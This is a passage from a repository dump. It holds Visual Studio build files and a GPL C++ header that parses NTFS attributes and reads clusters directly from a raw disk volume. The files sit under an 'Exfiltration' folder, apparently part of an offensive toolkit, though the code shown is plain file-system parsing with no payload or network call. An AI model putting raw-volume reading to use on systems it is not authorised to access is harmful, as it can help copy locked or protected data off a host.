Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"dllmain.cpp\">\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">false</CompileAsManaged>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">false</CompileAsManaged>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n      </PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n      </PrecompiledHeader>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">false</CompileAsManaged>\n      <CompileAsManaged Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">false</CompileAsManaged>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n      </PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n      </PrecompiledHeader>\n    </ClCompile>\n    <ClCompile Include=\"NTFSParserDLL.cpp\" />\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"NTFSParserDLL.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"dllmain.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/NTFS_Attribute.h",
    "content": "/*\n * NTFS Attribute Classes\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef\t__NTFS_ATTRIBUTE_H_CYB70289\n#define\t__NTFS_ATTRIBUTE_H_CYB70289\n\n\n////////////////////////////////\n// List to hold parsed DataRuns\n////////////////////////////////\ntypedef struct tagDataRun_Entry\n{\n\tLONGLONG\t\t\tLCN;\t\t// -1 to indicate sparse data\n\tULONGLONG\t\t\tClusters;\n\tULONGLONG\t\t\tStartVCN;\n\tULONGLONG\t\t\tLastVCN;\n} DataRun_Entry;\ntypedef class CSList<DataRun_Entry> CDataRunList;\n\n////////////////////////////////////\n// List to hold Index Entry objects\n////////////////////////////////////\nclass CIndexEntry;\ntypedef class CSList<CIndexEntry> CIndexEntryList;\n\n\n////////////////////////////////\n// Attributes base class\n////////////////////////////////\nclass CAttrBase\n{\npublic:\n\tCAttrBase(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttrBase();\n\nprotected:\n\tconst ATTR_HEADER_COMMON *AttrHeader;\n\tWORD _SectorSize;\n\tDWORD _ClusterSize;\n\tDWORD _IndexBlockSize;\n\tHANDLE _hVolume;\n\tconst CFileRecord *FileRecord;\n\npublic:\n\t__inline const ATTR_HEADER_COMMON* GetAttrHeader() const;\n\t__inline DWORD GetAttrType() const;\n\t__inline DWORD GetAttrTotalSize() const;\n\t__inline BOOL IsNonResident() const;\n\t__inline WORD GetAttrFlags() const;\n\tint GetAttrName(char *buf, DWORD bufLen) const;\n\tint GetAttrName(wchar_t *buf, DWORD bufLen) const;\n\t__inline BOOL IsUnNamed() const;\n\nprotected:\n\tvirtual __inline BOOL IsDataRunOK() const = 0;\n\npublic:\n\tvirtual __inline ULONGLONG GetDataSize(ULONGLONG *allocSize = NULL) const = 0;\n\tvirtual BOOL ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const = 0;\n};\t// CAttrBase\n\nCAttrBase::CAttrBase(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr)\n{\n\t_ASSERT(ahc);\n\t_ASSERT(fr);\n\n\tAttrHeader = ahc;\n\tFileRecord = fr;\n\n\t_SectorSize = fr->Volume->SectorSize;\n\t_ClusterSize = fr->Volume->ClusterSize;\n\t_IndexBlockSize = fr->Volume->IndexBlockSize;\n\t_hVolume = fr->Volume->hVolume;\n}\n\nCAttrBase::~CAttrBase()\n{\n}\n\n__inline const ATTR_HEADER_COMMON* CAttrBase::GetAttrHeader() const\n{\n\treturn AttrHeader;\n}\n\n__inline DWORD CAttrBase::GetAttrType() const\n{\n\treturn AttrHeader->Type;\n}\n\n__inline DWORD CAttrBase::GetAttrTotalSize() const\n{\n\treturn AttrHeader->TotalSize;\n}\n\n__inline BOOL CAttrBase::IsNonResident() const\n{\n\treturn AttrHeader->NonResident;\n}\n\n__inline WORD CAttrBase::GetAttrFlags() const\n{\n\treturn AttrHeader->Flags;\n}\n\n// Get ANSI Attribute name\n// Return 0: Unnamed, <0: buffer too small, -buffersize, >0 Name length\nint CAttrBase::GetAttrName(char *buf, DWORD bufLen) const\n{\n\tif (AttrHeader->NameLength)\n\t{\n\t\tif (bufLen < AttrHeader->NameLength)\n\t\t\treturn -1*AttrHeader->NameLength;\t// buffer too small\n\n\t\twchar_t *namePtr = (wchar_t*)((BYTE*)AttrHeader + AttrHeader->NameOffset);\n\t\tint len = WideCharToMultiByte(CP_ACP, 0, namePtr, AttrHeader->NameLength,\n\t\t\tbuf, bufLen, NULL, NULL);\n\t\tif (len)\n\t\t{\n\t\t\tbuf[len] = '\\0';\n\t\t\tNTFS_TRACE1(\"Attribute name: %s\\n\", buf);\n\t\t\treturn len;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"Unrecognized attribute name or Name buffer too small\\n\");\n\t\t\treturn -1*AttrHeader->NameLength;\n\t\t}\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE(\"Attribute is unnamed\\n\");\n\t\treturn 0;\n\t}\n}\n\n// Get UNICODE Attribute name\n// Return 0: Unnamed, <0: buffer too small, -buffersize, >0 Name length\nint CAttrBase::GetAttrName(wchar_t *buf, DWORD bufLen) const\n{\n\tif (AttrHeader->NameLength)\n\t{\n\t\tif (bufLen < AttrHeader->NameLength)\n\t\t\treturn -1*AttrHeader->NameLength;\t// buffer too small\n\n\t\tbufLen = AttrHeader->NameLength;\n\t\twchar_t *namePtr = (wchar_t*)((BYTE*)AttrHeader + AttrHeader->NameOffset);\n\t\twcsncpy(buf, namePtr, bufLen);\n\t\tbuf[bufLen] = '\\0\\0';\n\n\t\tNTFS_TRACE(\"Unicode Attribute Name\\n\");\n\t\treturn bufLen;\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE(\"Attribute is unnamed\\n\");\n\t\treturn 0;\n\t}\n}\n\n// Verify if this attribute is unnamed\n// Useful in analyzing MultiStream files\n__inline BOOL CAttrBase::IsUnNamed() const\n{\n\treturn (AttrHeader->NameLength == 0);\n}\n\n\n////////////////////////////////\n// Resident Attributes\n////////////////////////////////\nclass CAttrResident : public CAttrBase\n{\npublic:\n\tCAttrResident(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttrResident();\n\nprotected:\n\tconst ATTR_HEADER_RESIDENT *AttrHeaderR;\n\tconst void *AttrBody;\t// Points to Resident Data\n\tDWORD AttrBodySize;\t\t// Attribute Data Size\n\n\tvirtual __inline BOOL IsDataRunOK() const;\n\npublic:\n\tvirtual __inline ULONGLONG GetDataSize(ULONGLONG *allocSize = NULL) const;\n\tvirtual BOOL ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const;\n};\t// CAttrResident\n\nCAttrResident::CAttrResident(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrBase(ahc, fr)\n{\n\tAttrHeaderR = (ATTR_HEADER_RESIDENT*)ahc;\n\tAttrBody = (void*)((BYTE*)AttrHeaderR + AttrHeaderR->AttrOffset);\n\tAttrBodySize = AttrHeaderR->AttrSize;\n}\n\nCAttrResident::~CAttrResident()\n{\n}\n\n__inline BOOL CAttrResident::IsDataRunOK() const\n{\n\treturn TRUE;\t// Always OK for a resident attribute\n}\n\n// Return Actural Data Size\n// *allocSize = Allocated Size\n__inline ULONGLONG CAttrResident::GetDataSize(ULONGLONG *allocSize) const\n{\n\tif (allocSize)\n\t\t*allocSize = AttrBodySize;\n\n\treturn (ULONGLONG)AttrBodySize;\n}\n\n// Read \"bufLen\" bytes from \"offset\" into \"bufv\"\n// Number of bytes acturally read is returned in \"*actural\"\nBOOL CAttrResident::ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const\n{\n\t_ASSERT(bufv);\n\n\t*actural = 0;\n\tif (bufLen == 0)\n\t\treturn TRUE;\n\n\tDWORD offsetd = (DWORD)offset;\n\tif (offsetd >= AttrBodySize)\n\t\treturn FALSE;\t// offset parameter error\n\n\tif ((offsetd + bufLen) > AttrBodySize)\n\t\t*actural = AttrBodySize - offsetd;\t// Beyond scope\n\telse\n\t\t*actural = bufLen;\n\n\tmemcpy(bufv, (BYTE*)AttrBody + offsetd, *actural);\n\n\treturn TRUE;\n}\n\n\n////////////////////////////////\n// NonResident Attributes\n////////////////////////////////\nclass CAttrNonResident : public CAttrBase\n{\npublic:\n\tCAttrNonResident(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttrNonResident();\n\nprotected:\n\tconst ATTR_HEADER_NON_RESIDENT *AttrHeaderNR;\n\tCDataRunList DataRunList;\n\nprivate:\n\tBOOL bDataRunOK;\n\tBYTE *UnalignedBuf;\t// Buffer to hold not cluster aligned data\n\tBOOL PickData(const BYTE **dataRun, LONGLONG *length, LONGLONG *LCNOffset);\n\tBOOL ParseDataRun();\n\tBOOL ReadClusters(void *buf, DWORD clusters, LONGLONG lcn);\n\tBOOL ReadVirtualClusters(ULONGLONG vcn, DWORD clusters,\n\t\tvoid *bufv, DWORD bufLen, DWORD *actural);\n\nprotected:\n\tvirtual __inline BOOL IsDataRunOK() const;\n\npublic:\n\tvirtual __inline ULONGLONG GetDataSize(ULONGLONG *allocSize = NULL) const;\n\tvirtual BOOL ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const;\n};\t// CAttrNonResident\n\nCAttrNonResident::CAttrNonResident(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrBase(ahc, fr)\n{\n\tAttrHeaderNR = (ATTR_HEADER_NON_RESIDENT*)ahc;\n\n\tUnalignedBuf = new BYTE[_ClusterSize];\n\n\tbDataRunOK = ParseDataRun();\n}\n\nCAttrNonResident::~CAttrNonResident()\n{\n\tdelete UnalignedBuf;\n\n\tDataRunList.RemoveAll();\n}\n\n// Parse a single DataRun unit\nBOOL CAttrNonResident::PickData(const BYTE **dataRun, LONGLONG *length, LONGLONG *LCNOffset)\n{\n\tBYTE size = **dataRun;\n\t(*dataRun)++;\n\tint lengthBytes = size & 0x0F;\n\tint offsetBytes = size >> 4;\n\n\tif (lengthBytes > 8 || offsetBytes > 8)\n\t{\n\t\tNTFS_TRACE1(\"DataRun decode error 1: 0x%02X\\n\", size);\n\t\treturn FALSE;\n\t}\n\n\t*length = 0;\n\tmemcpy(length, *dataRun, lengthBytes);\n\tif (*length < 0)\n\t{\n\t\tNTFS_TRACE1(\"DataRun length error: %I64d\\n\", *length);\n\t\treturn FALSE;\n\t}\n\n\t(*dataRun) += lengthBytes;\n\t*LCNOffset = 0;\n\tif (offsetBytes)\t// Not Sparse File\n\t{\n\t\tif ((*dataRun)[offsetBytes-1] & 0x80)\n\t\t\t*LCNOffset = -1;\n\t\tmemcpy(LCNOffset, *dataRun, offsetBytes);\n\n\t\t(*dataRun) += offsetBytes;\n\t}\n\n\treturn TRUE;\n}\n\n// Travers DataRun and insert into a link list\nBOOL CAttrNonResident::ParseDataRun()\n{\n\tNTFS_TRACE(\"Parsing Non Resident DataRun\\n\");\n\tNTFS_TRACE2(\"Start VCN = %I64u, End VCN = %I64u\\n\",\n\t\t\tAttrHeaderNR->StartVCN, AttrHeaderNR->LastVCN);\n\n\tconst BYTE *dataRun = (BYTE*)AttrHeaderNR + AttrHeaderNR->DataRunOffset;\n\tLONGLONG length;\n\tLONGLONG LCNOffset;\n\tLONGLONG LCN = 0;\n\tULONGLONG VCN = 0;\n\n\twhile (*dataRun)\n\t{\n\t\tif (PickData(&dataRun, &length, &LCNOffset))\n\t\t{\n\t\t\tLCN += LCNOffset;\n\t\t\tif (LCN < 0)\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"DataRun decode error 2\\n\");\n\t\t\t\treturn FALSE;\n\t\t\t}\n\n\t\t\tNTFS_TRACE2(\"Data length = %I64d clusters, LCN = %I64d\", length, LCN);\n\t\t\tNTFS_TRACE(LCNOffset == 0 ? \", Sparse Data\\n\" : \"\\n\");\n\n\t\t\t// Store LCN, Data size (clusters) into list\n\t\t\tDataRun_Entry *dr = new DataRun_Entry;\n\t\t\tdr->LCN = (LCNOffset == 0) ? -1 : LCN;\n\t\t\tdr->Clusters = length;\n\t\t\tdr->StartVCN = VCN;\n\t\t\tVCN += length;\n\t\t\tdr->LastVCN = VCN - 1;\n\n\t\t\tif (dr->LastVCN <= (AttrHeaderNR->LastVCN - AttrHeaderNR->StartVCN))\n\t\t\t{\n\t\t\t\tDataRunList.InsertEntry(dr);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"DataRun decode error: VCN exceeds bound\\n\");\n\n\t\t\t\t// Remove entries\n\t\t\t\tDataRunList.RemoveAll();\n\n\t\t\t\treturn FALSE;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t\tbreak;\n\t}\n\n\treturn TRUE;\n}\n\n// Read clusters from disk, or sparse data\n// *actural = Clusters acturally read\nBOOL CAttrNonResident::ReadClusters(void *buf, DWORD clusters, LONGLONG lcn)\n{\n\tif (lcn == -1)\t// sparse data\n\t{\n\t\tNTFS_TRACE(\"Sparse Data, Fill the buffer with 0\\n\");\n\n\t\t// Fill the buffer with 0\n\t\tmemset(buf, 0, clusters * _ClusterSize);\n\n\t\treturn TRUE;\n\t}\n\n\tLARGE_INTEGER addr;\n\tDWORD len;\n\n\taddr.QuadPart = lcn * _ClusterSize;\n\tlen = SetFilePointer(_hVolume, addr.LowPart, &addr.HighPart, FILE_BEGIN);\n\n\tif (len == (DWORD)-1 && GetLastError() != NO_ERROR)\n\t{\n\t\tNTFS_TRACE1(\"Cannot locate cluster with LCN %I64d\\n\", lcn);\n\t}\n\telse\n\t{\n\t\tif (ReadFile(_hVolume, buf, clusters*_ClusterSize, &len, NULL) &&\n\t\t\tlen == clusters*_ClusterSize)\n\t\t{\n\t\t\tNTFS_TRACE2(\"Successfully read %u clusters from LCN %I64d\\n\", clusters, lcn);\n\t\t\treturn TRUE;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE1(\"Cannot read cluster with LCN %I64d\\n\", lcn);\n\t\t}\n\t}\n\n\treturn FALSE;\n}\n\n// Read Data, cluster based\n// clusterNo: Begnning cluster Number\n// clusters: Clusters to read\n// bufv, bufLen: Returned data\n// *actural = Number of bytes acturally read\nBOOL CAttrNonResident::ReadVirtualClusters(ULONGLONG vcn, DWORD clusters,\n\tvoid *bufv, DWORD bufLen, DWORD *actural)\n{\n\t_ASSERT(bufv);\n\t_ASSERT(clusters);\n\n\t*actural = 0;\n\tBYTE *buf = (BYTE*)bufv;\n\n\t// Verify if clusters exceeds DataRun bounds\n\tif (vcn + clusters > (AttrHeaderNR->LastVCN - AttrHeaderNR->StartVCN +1))\n\t{\n\t\tNTFS_TRACE(\"Cluster exceeds DataRun bounds\\n\");\n\t\treturn FALSE;\n\t}\n\n\t// Verify buffer size\n\tif (bufLen < clusters*_ClusterSize)\n\t{\n\t\tNTFS_TRACE(\"Buffer size too small\\n\");\n\t\treturn FALSE;\n\t}\n\n\t// Traverse the DataRun List to find the according LCN\n\tconst DataRun_Entry *dr = DataRunList.FindFirstEntry();\n\twhile(dr)\n\t{\n\t\tif (vcn>=dr->StartVCN && vcn<=dr->LastVCN)\n\t\t{\n\t\t\tDWORD clustersToRead;\n\n\t\t\tULONGLONG vcns = dr->LastVCN - vcn + 1;\t// Clusters from read pointer to the end\n\n\t\t\tif ((ULONGLONG)clusters > vcns)\t// Fragmented data, we must go on\n\t\t\t\tclustersToRead = (DWORD)vcns;\n\t\t\telse\n\t\t\t\tclustersToRead = clusters;\n\t\t\tif (ReadClusters(buf, clustersToRead, dr->LCN+(vcn-dr->StartVCN)))\n\t\t\t{\n\t\t\t\tbuf += clustersToRead*_ClusterSize;\n\t\t\t\tclusters -= clustersToRead;\n\t\t\t\t*actural += clustersToRead;\n\t\t\t\tvcn += clustersToRead;\n\t\t\t}\n\t\t\telse\n\t\t\t\tbreak;\n\n\t\t\tif (clusters == 0)\n\t\t\t\tbreak;\n\t\t}\n\n\t\tdr = DataRunList.FindNextEntry();\n\t}\n\n\t*actural *= _ClusterSize;\n\treturn TRUE;\n}\n\n// Judge if the DataRun is successfully parsed\n__inline BOOL CAttrNonResident::IsDataRunOK() const\n{\n\treturn bDataRunOK;\n}\n\n// Return Actural Data Size\n// *allocSize = Allocated Size\n__inline ULONGLONG CAttrNonResident::GetDataSize(ULONGLONG *allocSize) const\n{\n\tif (allocSize)\n\t\t*allocSize = AttrHeaderNR->AllocSize;\n\n\treturn AttrHeaderNR->RealSize;\n}\n\n// Read \"bufLen\" bytes from \"offset\" into \"bufv\"\n// Number of bytes acturally read is returned in \"*actural\"\nBOOL CAttrNonResident::ReadData(const ULONGLONG &offset, void *bufv, DWORD bufLen, DWORD *actural) const\n{\n\t// Hard disks can only be accessed by sectors\n\t// To be simple and efficient, only implemented cluster based accessing\n\t// So cluster unaligned data address should be processed carefully here\n\n\t_ASSERT(bufv);\n\n\t*actural = 0;\n\tif (bufLen == 0)\n\t\treturn TRUE;\n\n\t// Bounds check\n\tif (offset > AttrHeaderNR->RealSize)\n\t\treturn FALSE;\n\tif ((offset + bufLen) > AttrHeaderNR->RealSize)\n\t\tbufLen = (DWORD)(AttrHeaderNR->RealSize - offset);\n\n\tDWORD len;\n\tBYTE *buf = (BYTE*)bufv;\n\n\t// First cluster Number\n\tULONGLONG startVCN = offset / _ClusterSize;\n\t// Bytes in first cluster\n\tDWORD startBytes = _ClusterSize - (DWORD)(offset % _ClusterSize);\n\t// Read first cluster\n\tif (startBytes != _ClusterSize)\n\t{\n\t\t// First cluster, Unaligned\n\t\tif (((CAttrNonResident*)this)->ReadVirtualClusters(startVCN, 1, UnalignedBuf, _ClusterSize, &len)\n\t\t\t&& len == _ClusterSize)\n\t\t{\n\t\t\tlen = (startBytes < bufLen) ? startBytes : bufLen;\n\t\t\tmemcpy(buf, UnalignedBuf + _ClusterSize - startBytes, len);\n\t\t\tbuf += len;\n\t\t\tbufLen -= len;\n\t\t\t*actural += len;\n\t\t\tstartVCN++;\n\t\t}\n\t\telse\n\t\t\treturn FALSE;\n\t}\n\tif (bufLen == 0)\n\t\treturn TRUE;\n\n\tDWORD alignedClusters = bufLen / _ClusterSize;\n\tif (alignedClusters)\n\t{\n\t\t// Aligned clusters\n\t\tDWORD alignedSize = alignedClusters*_ClusterSize;\n\t\tif (((CAttrNonResident*)this)->ReadVirtualClusters(startVCN, alignedClusters, buf, alignedSize, &len)\n\t\t\t&& len == alignedSize)\n\t\t{\n\t\t\tstartVCN += alignedClusters;\n\t\t\tbuf += alignedSize;\n\t\t\tbufLen %= _ClusterSize;\n\t\t\t*actural += len;\n\n\t\t\tif (bufLen == 0)\n\t\t\t\treturn TRUE;\n\t\t}\n\t\telse\n\t\t\treturn FALSE;\n\t}\n\n\t// Last cluster, Unaligned\n\tif (((CAttrNonResident*)this)->ReadVirtualClusters(startVCN, 1, UnalignedBuf, _ClusterSize, &len)\n\t\t&& len == _ClusterSize)\n\t{\n\t\tmemcpy(buf, UnalignedBuf, bufLen);\n\t\t*actural += bufLen;\n\n\t\treturn TRUE;\n\t}\n\telse\n\t\treturn FALSE;\n}\n\n\n///////////////////////////////////\n// Attribute: Standard Information\n///////////////////////////////////\nclass CAttr_StdInfo : public CAttrResident\n{\npublic:\n\tCAttr_StdInfo(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_StdInfo();\n\nprivate:\n\tconst ATTR_STANDARD_INFORMATION *StdInfo;\n\npublic:\n\tvoid GetFileTime(FILETIME *writeTm, FILETIME *createTm = NULL, FILETIME *accessTm = NULL) const;\n\t__inline DWORD GetFilePermission() const;\n\t__inline BOOL IsReadOnly() const;\n\t__inline BOOL IsHidden() const;\n\t__inline BOOL IsSystem() const;\n\t__inline BOOL IsCompressed() const;\n\t__inline BOOL IsEncrypted() const;\n\t__inline BOOL IsSparse() const;\n\n\tstatic void UTC2Local(const ULONGLONG &ultm, FILETIME *lftm);\n};\t// CAttr_StdInfo\n\nCAttr_StdInfo::CAttr_StdInfo(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrResident(ahc, fr)\n{\n\tNTFS_TRACE(\"Attribute: Standard Information\\n\");\n\n\tStdInfo = (ATTR_STANDARD_INFORMATION*)AttrBody;\n}\n\nCAttr_StdInfo::~CAttr_StdInfo()\n{\n\tNTFS_TRACE(\"CAttr_StdInfo deleted\\n\");\n}\n\n// Change from UTC time to local time\nvoid CAttr_StdInfo::GetFileTime(FILETIME *writeTm, FILETIME *createTm, FILETIME *accessTm) const\n{\n\tUTC2Local(StdInfo->AlterTime, writeTm);\n\n\tif (createTm)\n\t\tUTC2Local(StdInfo->CreateTime, createTm);\n\n\tif (accessTm)\n\t\tUTC2Local(StdInfo->ReadTime, accessTm);\n}\n\n__inline DWORD CAttr_StdInfo::GetFilePermission() const\n{\n\treturn StdInfo->Permission;\n}\n\n__inline BOOL CAttr_StdInfo::IsReadOnly() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_READONLY);\n}\n\n__inline BOOL CAttr_StdInfo::IsHidden() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_HIDDEN);\n}\n\n__inline BOOL CAttr_StdInfo::IsSystem() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_SYSTEM);\n}\n\n__inline BOOL CAttr_StdInfo::IsCompressed() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_COMPRESSED);\n}\n\n__inline BOOL CAttr_StdInfo::IsEncrypted() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_ENCRYPTED);\n}\n\n__inline BOOL CAttr_StdInfo::IsSparse() const\n{\n\treturn ((StdInfo->Permission) & ATTR_STDINFO_PERMISSION_SPARSE);\n}\n\n// UTC filetime to Local filetime\nvoid CAttr_StdInfo::UTC2Local(const ULONGLONG &ultm, FILETIME *lftm)\n{\n\tLARGE_INTEGER fti;\n\tFILETIME ftt;\n\n\tfti.QuadPart = ultm;\n\tftt.dwHighDateTime = fti.HighPart;\n\tftt.dwLowDateTime = fti.LowPart;\n\n\tif (!FileTimeToLocalFileTime(&ftt, lftm))\n\t\t*lftm = ftt;\n}\n\n\n////////////////////////////////////////\n// FileName helper class\n// used by FileName and IndexEntry\n////////////////////////////////////////\nclass CFileName\n{\npublic:\n\tCFileName(ATTR_FILE_NAME *fn = NULL);\n\tvirtual ~CFileName();\n\nprotected:\n\tconst ATTR_FILE_NAME *FileName;\t// May be NULL for an IndexEntry\n\twchar_t *FileNameWUC;\t// Uppercase Unicode File Name, used to compare file names\n\tint FileNameLength;\n\tBOOL IsCopy;\n\n\t__inline void SetFileName(ATTR_FILE_NAME *fn);\n\tvoid CFileName::CopyFileName(const CFileName *fn, const ATTR_FILE_NAME *afn);\n\nprivate:\n\tvoid GetFileNameWUC();\n\npublic:\n\tint Compare(const wchar_t *fn) const;\n\tint Compare(const char *fn) const;\n\n\t__inline ULONGLONG GetFileSize() const;\n\t__inline DWORD GetFilePermission() const;\n\t__inline BOOL IsReadOnly() const;\n\t__inline BOOL IsHidden() const;\n\t__inline BOOL IsSystem() const;\n\t__inline BOOL IsDirectory() const;\n\t__inline BOOL IsCompressed() const;\n\t__inline BOOL IsEncrypted() const;\n\t__inline BOOL IsSparse() const;\n\n\tint GetFileName(char *buf, DWORD bufLen) const;\n\tint GetFileName(wchar_t *buf, DWORD bufLen) const;\n\t__inline BOOL HasName() const;\n\t__inline BOOL IsWin32Name() const;\n\n\tvoid GetFileTime(FILETIME *writeTm, FILETIME *createTm = NULL, FILETIME *accessTm = NULL) const;\n};\t// CFileName\n\nCFileName::CFileName(ATTR_FILE_NAME *fn)\n{\n\tIsCopy = FALSE;\n\n\tFileName = fn;\n\n\tFileNameWUC = NULL;\n\tFileNameLength = 0;\n\n\tif (fn)\n\t\tGetFileNameWUC();\n}\n\nCFileName::~CFileName()\n{\n\tif (FileNameWUC)\n\t\tdelete FileNameWUC;\n}\n\n__inline void CFileName::SetFileName(ATTR_FILE_NAME *fn)\n{\n\tFileName = fn;\n\n\tGetFileNameWUC();\n}\n\n// Copy pointer buffers\nvoid CFileName::CopyFileName(const CFileName *fn, const ATTR_FILE_NAME *afn)\n{\n\tif (!IsCopy)\n\t{\n\t\tNTFS_TRACE(\"Cannot call this routine\\n\");\n\t\treturn;\n\t}\n\n\t_ASSERT(fn && afn);\n\n\tNTFS_TRACE(\"FileName Copied\\n\");\n\n\tif (FileNameWUC)\n\t\tdelete FileNameWUC;\n\n\tFileNameLength = fn->FileNameLength;\n\tFileName = afn;\n\n\tif (fn->FileNameWUC)\n\t{\n\t\tFileNameWUC = new wchar_t[FileNameLength+1];\n\t\twcsncpy(FileNameWUC, fn->FileNameWUC, FileNameLength);\n\t\tFileNameWUC[FileNameLength] = wchar_t('\\0');\n\t}\n\telse\n\t\tFileNameWUC = NULL;\n}\n\n// Get uppercase unicode filename and store it in a buffer\nvoid CFileName::GetFileNameWUC()\n{\n#ifdef\t_DEBUG\n\tchar fna[MAX_PATH];\n\tGetFileName(fna, MAX_PATH);\t// Just show filename in debug window\n#endif\n\n\tif (FileNameWUC)\n\t{\n\t\tdelete FileNameWUC;\n\t\tFileNameWUC = NULL;\n\t\tFileNameLength = 0;\n\t}\n\n\twchar_t fns[MAX_PATH];\n\tFileNameLength = GetFileName(fns, MAX_PATH);\n\n\tif (FileNameLength > 